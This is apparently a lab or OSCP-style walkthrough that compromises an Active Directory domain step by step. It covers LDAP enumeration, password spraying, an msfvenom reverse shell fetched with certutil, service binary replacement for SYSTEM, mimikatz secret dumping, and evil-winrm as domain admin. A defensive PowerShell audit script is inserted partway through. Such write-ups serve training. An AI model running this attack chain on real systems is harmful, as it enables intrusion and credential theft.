
MS01-v1 (Passcore)

AD Set 1 MS01-V1 - PASSCORE

192.168.xx.100 - DC01

192.168.xx.101 - MS02

192.168.xx.102 - MS01

192.168.xxx.100

Initial Access: getting a USERNAME and PASSWORD for SSH

Run nmap with the ldap NSE scripts to get the default password, which is ESMWaterP1p3S!

1. Default Password: ESMWaterP1p3S!

kali@kali:$ sudo nmap -sCV -T4 -oA nmap/initial --script "ldap* and not brute" 192.168.xxx.100

We will get some open ports; 389 (ldap) will be one of them. Using ldapsearch we get the list of usernames, and the default password can also be found here.

2. Usernames And Password

# anonymous simple bind (-x) against the DC: empty bind DN (-D) and password (-w), base DN set with -b
kali@kali:$ sudo ldapsearch -x -H ldap://192.168.xx.100 -D '' -w '' -b "DC=oscp,DC=exam" > data.txt

Create a new file usernames.txt containing every user found in the ldapsearch output.
After running this query we have the usernames and the password; save the usernames in the new file usernames.txt.

3. Password Sprays on all machines using CrackMapExec


# smb
kali@kali:$ sudo cme smb 192.168.xx.100 -u usernames.txt -p 'ESMWaterP1p3S!'

# smb
kali@kali:$ sudo cme smb 192.168.xx.101 -u usernames.txt -p 'ESMWaterP1p3S!'

# ssh
kali@kali:$ sudo cme ssh 192.168.xx.102 -u usernames.txt -p 'ESMWaterP1p3S!'

Now we have a valid credential on all 3 machines, it’s Ketty.Agan:ESMWaterP1p3S!

192.168.xxx.102

4. Ketty.Agan user shell on 192.168.xxx.102

# password - ESMWaterP1p3S!
kali@kali:$ ssh ketty.agan@192.168.xxx.102

Privilege Escalation: Insecure Service Executables

After running winPEAS we find "C:\Program Files\Pipes Printing Service\PipesPrinting.exe", and
we have WriteData/CreateFiles permission on that directory.

5. Generate Reverse Shell using msfvenom

kali@kali:$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<Your IP> LPORT=9001 -f exe -o shell.exe

6. Start a Python HTTP server on your machine

kali@kali:$ sudo python3 -m http.server 80

7. Downloading shell.exe to the machine

PS C:\Users\ketty.agan\Desktop> certutil -urlcache -f -split http://192.168.xx.xx/shell.exe shell.exe

Now move/rename PipesPrinting.exe to any random name, e.g. temp.exe.

8. Moving/Renaming the PipesPrinting.exe file and placing our reverse shell

# Rename
PS C:\Users\ketty.agan\Desktop> move "C:\Program Files\Pipes Printing Service\PipesPrinting.exe" temp.exe

# Placing our payload
PS C:\Users\ketty.agan\Desktop> move "C:\Users\ketty.agan\Desktop\shell.exe" "C:\Program Files\Pipes Printing Service\PipesPrinting.exe"

9. Start an nc listener

kali@kali:$ nc -lnvp 9001

10. Restart the service (here by rebooting the box) to get a SYSTEM shell back on the attacker box

PS C:\Users\ketty.agan\Desktop> shutdown /r

After that we get a SYSTEM shell on the box; now we can use mimikatz.exe for dumping passwords.
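The weakness used above is a service binary sitting in a directory that low-privilege users can write to. The following audit script is an added example, not part of the original walkthrough: it lists every service whose binary or parent directory grants write-type rights to Everyone, Users, Authenticated Users or INTERACTIVE, so a defender can find and fix such paths before they are abused. Principal names assume an English locale; the remediation path in the trailing comment is a constructed example.

```powershell
# Added example: audit services for binaries (or their parent directory) that
# low-privilege principals can modify. Run in an elevated PowerShell on the host.
$LowPrivPrincipals = @(
    'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)
# Access-mask bits that let a caller replace or add files: FILE_WRITE_DATA (0x2,
# the same bit as FILE_ADD_FILE / "CreateFiles" on a directory), FILE_APPEND_DATA,
# DELETE, WRITE_DAC, WRITE_OWNER, plus GENERIC_WRITE and GENERIC_ALL, which
# Get-Acl shows as raw numbers instead of FileSystemRights names.
$WriteMask = 0x2 -bor 0x4 -bor 0x10000 -bor 0x40000 -bor 0x80000 -bor 0x40000000 -bor 0x10000000

function Get-ServiceBinaryPath([string]$PathName) {
    # Quoted image path: take what is between the quotes. Unquoted: take up to ".exe".
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^\s*(.+?\.exe)') { return $Matches[1] }
    return $null
}

function Find-WritableServiceTargets {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $exe = Get-ServiceBinaryPath $svc.PathName
        if (-not $exe) { continue }
        # Check the binary itself and the directory it lives in.
        foreach ($target in @($exe, (Split-Path -Path $exe -Parent))) {
            try { $acl = Get-Acl -LiteralPath $target -ErrorAction Stop } catch { continue }
            foreach ($rule in $acl.Access) {
                if ($rule.AccessControlType -ne 'Allow') { continue }
                if ($LowPrivPrincipals -notcontains $rule.IdentityReference.Value) { continue }
                if (([int]$rule.FileSystemRights -band $WriteMask) -eq 0) { continue }
                [pscustomobject]@{
                    Service  = $svc.Name
                    RunsAs   = $svc.StartName
                    Target   = $target
                    Identity = $rule.IdentityReference.Value
                    Rights   = $rule.FileSystemRights
                }
            }
        }
    }
}

Find-WritableServiceTargets | Format-Table -AutoSize

# Remediation for a finding like the one above (constructed example path): remove the
# write grant and leave read/execute only, so the service binary cannot be replaced.
#   icacls "C:\Program Files\Pipes Printing Service" /remove:g "BUILTIN\Users"
#   icacls "C:\Program Files\Pipes Printing Service" /grant "BUILTIN\Users:(OI)(CI)RX"
```

Any hit where RunsAs is LocalSystem deserves immediate attention, since replacing that binary yields SYSTEM on the next service start or reboot.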

Post Exploitation

11. Downloading mimikatz.exe to the box

PS C:\Users\Public> certutil -urlcache -f -split http://192.168.xx.xx/mimikatz.exe mimikatz.exe

12. Dumping passwords using mimikatz.exe

PS C:\Users\Public> mimikatz.exe
token::elevate
lsadump::secrets

Here we get the password of user Liv.Ungley.

Liv.Ungley's password is RockYou!
192.168.xxx.101

13. Use Remmina or xfreerdp to log in to the system

kali@kali:$ xfreerdp /v:192.168.xx.101 /u:liv.ungley /p:'RockYou!'

After connecting we can see there's an appsettings.json file in the C:\Passcore directory.

14. Getting the hardcoded password from the appsettings.json file

PS C:\Passcore> type appsettings.json

We get the Domain Admin password: G3x56wGq9fItu166

15. Getting a domain admin shell using evil-winrm

192.168.xx.100
kali@kali:$ evil-winrm -i 192.168.xx.100 -u passcore -p 'G3x56wGq9fItu166'

And we have compromised the full AD domain. Here you can read the last proof.txt.
